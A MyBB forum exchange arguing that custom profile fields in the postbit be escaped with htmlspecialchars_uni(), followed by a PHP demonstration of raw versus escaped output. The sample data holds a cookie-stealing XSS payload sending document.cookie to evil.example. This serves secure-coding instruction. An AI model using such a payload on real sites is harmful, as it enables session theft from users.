04-06-2009, 04:50 AM
(04-06-2009, 01:49 AM)Michael83 Wrote: That's why I said it could be seen as bogus. But it could be a benefit because many users seem to use $post['fidX'] in the postbit. And as $post['fidX'] is available without any modification in any PHP file, we could run it through htmlspecialchars_uni() just to ensure that there's no XSS possibility.
Absolutely. Another point would be that PHP cannot be used in templates, so users cannot sanitize it themselves. Just an extra security check that I think is needed.
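The situation the two posts describe, as an added example rather than code from the thread or from MyBB itself: a custom profile field value arrives in the postbit as $post['fidX'] unescaped, a template author cannot call PHP from a template, so the escaping has to be applied in PHP before the template is evaluated. The htmlspecialchars_uni() body below is a stand-alone re-implementation assumed to match MyBB's behaviour (escape &, <, > and " while leaving numeric entities such as &#8364; intact); escape_profile_fields() and render_postbit() are hypothetical helpers written for this example, and the $post row and template are constructed sample data.

```php
<?php
// Added example, not MyBB's own code. It shows why running $post['fidX']
// through htmlspecialchars_uni() in PHP matters: templates cannot escape
// the value themselves, so whatever reaches the template is what gets rendered.

// Assumed to match MyBB's htmlspecialchars_uni(): escape the HTML
// metacharacters but keep numeric character references (&#NNNN;) as they are.
function htmlspecialchars_uni($message)
{
    // Escape '&' unless it already starts a numeric character reference.
    $message = preg_replace("#&(?!\#[0-9]+;)#si", "&amp;", $message);
    $message = str_replace("<", "&lt;", $message);
    $message = str_replace(">", "&gt;", $message);
    $message = str_replace("\"", "&quot;", $message);
    return $message;
}

// Constructed sample row shaped like the data the postbit sees: profile field
// values are keyed fid<id>. fid1 carries a hostile value, fid2 a benign value
// containing a numeric entity that should survive escaping unchanged.
$post = array(
    'pid'      => 1,
    'username' => 'alice',
    'fid1'     => '<script>document.location="http://evil.example/?c="+document.cookie</script>',
    'fid2'     => 'Location: Berlin &#8364; zone',
);

// Hypothetical helper: escape every fidX key in place before any template is
// evaluated. Only keys of the form fid<digits> are touched, so other post data
// keeps whatever handling it already has.
function escape_profile_fields(array $post)
{
    foreach ($post as $key => $value) {
        if (preg_match('/^fid\d+$/', $key)) {
            $post[$key] = htmlspecialchars_uni($value);
        }
    }
    return $post;
}

// Hypothetical stand-in for template evaluation: substitute {$post['key']}
// tokens with the array values. MyBB evaluates templates as PHP strings; this
// substitute only exists to make the raw/escaped difference visible offline.
function render_postbit(array $post, $template)
{
    return preg_replace_callback('/\{\$post\[\'(\w+)\'\]\}/', function ($m) use ($post) {
        return isset($post[$m[1]]) ? $post[$m[1]] : '';
    }, $template);
}

// Constructed postbit fragment that uses the profile fields directly.
$template = "<div class=\"author\">{\$post['username']}</div>\n"
          . "<div class=\"field\">{\$post['fid1']}</div>\n"
          . "<div class=\"field\">{\$post['fid2']}</div>\n";

echo "--- raw: what a postbit using \$post['fidX'] emits without the check ---\n";
echo render_postbit($post, $template);

echo "--- escaped in PHP before template evaluation ---\n";
echo render_postbit(escape_profile_fields($post), $template);
```

Run it with `php` on the command line: the first block prints the script tag verbatim, which is the XSS the thread is worried about; the second prints it as `&lt;script&gt;...` while the `&#8364;` in fid2 is left alone, which is the reason for preferring htmlspecialchars_uni() over a plain htmlspecialchars() that would turn it into `&amp;#8364;`.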